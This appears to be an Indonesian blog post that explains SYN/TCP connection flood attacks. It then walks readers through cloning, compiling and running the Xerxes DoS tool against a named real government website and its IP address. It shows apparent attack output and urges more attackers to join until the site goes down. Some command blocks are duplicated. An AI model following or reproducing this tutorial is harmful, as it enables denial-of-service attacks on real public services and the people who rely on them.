APA ITU TCP CONECTION FLOOD ATTACK
Intinya, dengan SYN flood DDoS, pelaku mengirim permintaan koneksi TCP lebih cepat dari pada mesin yang ditargetkan yang bisa mengolahnya, menyebabkan jenuh jaringan.
Salah satu jenis serangan DDoS tertua dan paling umum, banjir sambungan, juga dikenal sebagai "banjir koneksi TCP" karena ia mencoba untuk menangani semua kemungkinan koneksi TCP di server. Dengan membanjiri server dengan permintaan koneksi baru, ini mencegah permintaan yang sah agar tidak dibuat dan dilayani.
KETERANGAN SERANGAN
Ketika klien dan server membuat "jabat tangan tiga arah" TCP normal, pertukaran seperti ini:1. Klien meminta koneksi dengan mengirim pesan SYN (sinkronisasi) ke server.
2. Server mengakui dengan mengirim pesan SYN-ACK (sinkronisasi-acknowledge) kembali ke klien.
3. Klien merespons dengan pesan ACK (acknowledge), dan koneksi dibuat.
Dalam serangan banjir SYN, penyerang mengirimkan paket SYN berulang ke setiap port pada server yang ditargetkan, sering menggunakan alamat IP palsu.
Server, yang tidak sadar akan serangan tersebut, menerima banyak permintaan yang tampaknya sah untuk membangun komunikasi.
Ini merespons setiap usaha dengan paket SYN-ACK dari masing-masing port terbuka.
Klien jahat juga tidak mengirim ACK yang diharapkan, atau-jika alamat IP palsu-tidak pernah menerima SYN-ACK di tempat pertama. Either way, server yang diserang akan menunggu pengakuan paket SYN-ACK-nya untuk beberapa lama.
Selama waktu ini, server tidak dapat menutup koneksi dengan mengirimkan paket RST, dan koneksi tetap terbuka. Sebelum koneksi bisa habis, paket SYN lain akan sampai. Hal ini menyebabkan semakin banyak koneksi setengah terbuka - dan memang serangan SYN flood juga disebut sebagai serangan "setengah terbuka".
Akhirnya, karena isi tabel overflow server dipenuhi, layanan ke klien yang sah akan ditolak, dan server bahkan mungkin mengalami kerusakan atau benturan.
Sementara banjir SYN "klasik" yang dijelaskan di atas mencoba untuk menghabiskan port jaringan, paket SYN juga dapat digunakan pada serangan DDoS yang mencoba menyumbat pipa Anda dengan paket palsu untuk mencapai kejenuhan jaringan. Jenis paket tidak penting. Namun, paket SYN sering digunakan karena mereka paling tidak mungkin ditolak secara default.
Bahan-bahan yang saya gunakan dan target itu sendiri.
Sytem Operasi : Parrot Security
Tool : Xerxes
Target : www.malaysia.gov.my
Ip target : 103.8.161.146
Tutorial
1. Download dan install dulu Xerxes di Github https://github.com/zanyarjamal/xerxesAtau dengan cara lewat terminal linux.
┌─[root@parrot]─[/home/user]
└──╼ #cd Desktop
┌─[root@parrot]─[/home/user/Desktop]
└──╼ #git clone https://github.com/zanyarjamal/xerxes.git
└──╼ #cd Desktop
┌─[root@parrot]─[/home/user/Desktop]
└──╼ #git clone https://github.com/zanyarjamal/xerxes.git
2. Jika sudah di download langsung saja kita buka Xerxes.
┌─[root@parrot]─[/home/user/Desktop]
└──╼ #cd xerxes
┌─[root@parrot]─[/home/user/Desktop/xerxes]
└──╼ #ls
README xerxes.c
┌─[root@parrot]─[/home/user/Desktop/xerxes]
└──╼ #gcc xerxes.c -o xerxes
└──╼ #cd xerxes
┌─[root@parrot]─[/home/user/Desktop/xerxes]
└──╼ #ls
README xerxes.c
┌─[root@parrot]─[/home/user/Desktop/xerxes]
└──╼ #gcc xerxes.c -o xerxes
3. Dan selanjutnya saat nya kita melancarkan serangan dengan membanjiri koneksi TCP website tersebut.
┌─[root@parrot]─[/home/user/Desktop/xerxes]
└──╼ #./xerxes www.malaysia.gov.my 80
[Connected -> www.malaysia.gov.my:80]
[Connected -> www.malaysia.gov.my:80]
[2: Voly Sent]
[3: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[4: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[Connected -> www.malaysia.gov.my:80]
[1: Voly Sent]
[0: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[9: Voly Sent]
└──╼ #./xerxes www.malaysia.gov.my 80
[Connected -> www.malaysia.gov.my:80]
[Connected -> www.malaysia.gov.my:80]
[2: Voly Sent]
[3: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[4: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[Connected -> www.malaysia.gov.my:80]
[1: Voly Sent]
[0: Voly Sent]
[Connected -> www.malaysia.gov.my:80]
[9: Voly Sent]
Keterangan :
./xerxes : memberi perintah untuk menjalankan Xerses
www.malaysia.gov.my : website target
atau bisa juga dengan ip address website target tersebut (misalkan: 103.8.161.146)
80 : adalah port website tersebut
Selanjutnya tunggu hingga Website target down dengan serangan TCP Conection Flood Attack.
Dan keberhasilan dalam serangan ini adalah banyaknya penyerang yang ikut untuk menyerang Website tersebut.
Good luck!! selamat mencoba!!
0 komentar